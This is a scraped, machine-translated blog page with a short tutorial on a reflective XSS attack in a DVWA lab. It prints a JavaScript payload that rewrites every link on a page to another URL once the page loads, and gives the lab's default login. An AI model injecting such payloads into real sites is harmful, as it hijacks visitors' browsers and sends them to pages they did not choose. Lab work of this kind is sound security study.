当前位置:网站首页>XX attack - reflective XSS attack hijacking user browser
XX attack - reflective XSS attack hijacking user browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflective XSS The attack jumps to the vulnerable page . In fact, it can also be in DVWA Attack directly in , But we constructed a relatively complex environment for demonstration purposes .
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript The code analysis window.onload When the web page is loaded , perform function Anonymous functions
The functionality :document.getElementsByTagName Gets all of the a label , Store in link Array , Use for The cycle will link Replace all elements in the array with malicious URLs .
open chrome browser , We're in reflex XSS Test the effect
Sign in http://192.168.98.66/DVWA-master/login.php user name : admin password :password , Change it to low Level
边栏推荐
- Aardio - 自己构造的getIconHandle的方法
- Chinese font Gan: zi2zi
- How to get a SharePoint online site created using the office365 group template
- [kv260] generate chip temperature curve with xadc
- Keithley 2100 software 𞓜 Keithley2400 test software ns SourceMeter
- Caesar
- LSTM of RNN
- 【Redis】一气呵成,带你了解Redis安装与连接
- How relational databases work
- Aardio - [problem] the problem of memory growth during the callback of bass Library
猜你喜欢
Connect timed out of database connection
Conscience Amway universal wheel SolidWorks model material website
How to make the two financial transactions faster
![[website architecture] solve 90% of distributed transactions in one move, and introduce the working principles and application scenarios of database transactions and distributed transactions](/img/2c/07d729d49b1d74553decac4588074e.png)
[website architecture] solve 90% of distributed transactions in one move, and introduce the working principles and application scenarios of database transactions and distributed transactions
【入门】截取字符串
How to use layui to display the data in the database in the form of tables
PWN attack and defense world int_ overflow
OJ输入输出练习
軟鍵盤高度報錯
5大组合拳,解决校园6大难题,护航教育信息化建设
随机推荐
Sqlalchemy creating MySQL_ Table
軟鍵盤高度報錯
postgresql源码学习(26)—— Windows vscode远程调试Linux上的postgresql
力扣每日一题-第31天-202.快乐数
How relational databases work
【入门】提取不重复的整数
[introduction] approximate value
Learn the knowledge you need to know about the communication protocol I2C bus
Teach you how to apply for domestic trademark online step by step
web254
The Windows C disk is full
[staff] key number (key number identification position | key number marking list | a major key identification principle | F, C, G position marking ascending | F major key identification principle | B
Sorting out tcp/udp communication problems
Access report realizes subtotal function
事务方法调用@Transactional
Aardio - 自己构造的getIconHandle的方法
Deep learning systematic learning
LSTM of RNN
[force deduction 10 days SQL introduction] Day10 control flow
[MySQL learning notes 25] SQL statement optimization